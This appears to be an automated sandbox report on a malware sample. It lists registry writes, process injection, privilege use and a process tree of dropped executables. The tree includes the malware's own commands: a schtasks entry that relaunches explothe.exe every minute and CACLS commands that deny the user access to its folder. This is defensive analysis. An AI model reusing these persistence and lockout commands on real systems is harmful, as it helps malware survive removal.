Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2860 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3284 wrote to memory of 5032 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9EEB.exe
PID 3284 wrote to memory of 5032 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9EEB.exe
PID 3284 wrote to memory of 5032 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9EEB.exe
PID 3284 wrote to memory of 4724 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A053.exe
PID 3284 wrote to memory of 4724 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A053.exe
PID 3284 wrote to memory of 4724 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A053.exe
PID 3284 wrote to memory of 5072 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3284 wrote to memory of 5072 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3284 wrote to memory of 3900 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1EB.exe
PID 3284 wrote to memory of 3900 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1EB.exe
PID 3284 wrote to memory of 3900 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A1EB.exe
PID 5032 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\9EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
PID 5032 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\9EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
PID 5032 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\9EEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
PID 3284 wrote to memory of 980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A298.exe
PID 3284 wrote to memory of 980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A298.exe
PID 3284 wrote to memory of 980 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A298.exe
PID 3208 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
PID 3208 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
PID 3208 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
PID 3284 wrote to memory of 1176 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A345.exe
PID 3284 wrote to memory of 1176 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A345.exe
PID 3284 wrote to memory of 1176 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A345.exe
PID 1116 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
PID 1116 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
PID 1116 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
PID 3284 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A4DC.exe
PID 3284 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A4DC.exe
PID 3284 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\A4DC.exe
PID 4528 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
PID 4528 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
PID 4528 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
PID 3088 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
PID 3088 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
PID 3088 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
PID 5072 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5072 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1176 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\A345.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1176 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\A345.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1176 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\A345.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3872 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3872 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3872 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3628 wrote to memory of 4740 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3628 wrote to memory of 4740 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3872 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3872 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 3284 wrote to memory of 3076 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp
PID 3284 wrote to memory of 3076 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp
PID 3284 wrote to memory of 3076 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp
PID 3284 wrote to memory of 1348 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C7D7.exe
PID 3284 wrote to memory of 1348 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C7D7.exe
PID 3284 wrote to memory of 1348 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\C7D7.exe
PID 4708 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 4708 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 4708 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 5072 wrote to memory of 4468 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe

"C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\9EEB.exe

C:\Users\Admin\AppData\Local\Temp\9EEB.exe

C:\Users\Admin\AppData\Local\Temp\A053.exe

C:\Users\Admin\AppData\Local\Temp\A053.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A11F.bat" "

C:\Users\Admin\AppData\Local\Temp\A1EB.exe

C:\Users\Admin\AppData\Local\Temp\A1EB.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe

C:\Users\Admin\AppData\Local\Temp\A298.exe

C:\Users\Admin\AppData\Local\Temp\A298.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe

C:\Users\Admin\AppData\Local\Temp\A345.exe

C:\Users\Admin\AppData\Local\Temp\A345.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

C:\Users\Admin\AppData\Local\Temp\A4DC.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d81246f8,0x7ff9d8124708,0x7ff9d8124718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4372 -ip 4372

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 784

C:\Users\Admin\AppData\Local\Temp\C4E8.exe

C:\Users\Admin\AppData\Local\Temp\C4E8.exe

C:\Users\Admin\AppData\Local\Temp\C7D7.exe

C:\Users\Admin\AppData\Local\Temp\C7D7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9d81246f8,0x7ff9d8124708,0x7ff9d8124718

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\CDE3.exe

C:\Users\Admin\AppData\Local\Temp\CDE3.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

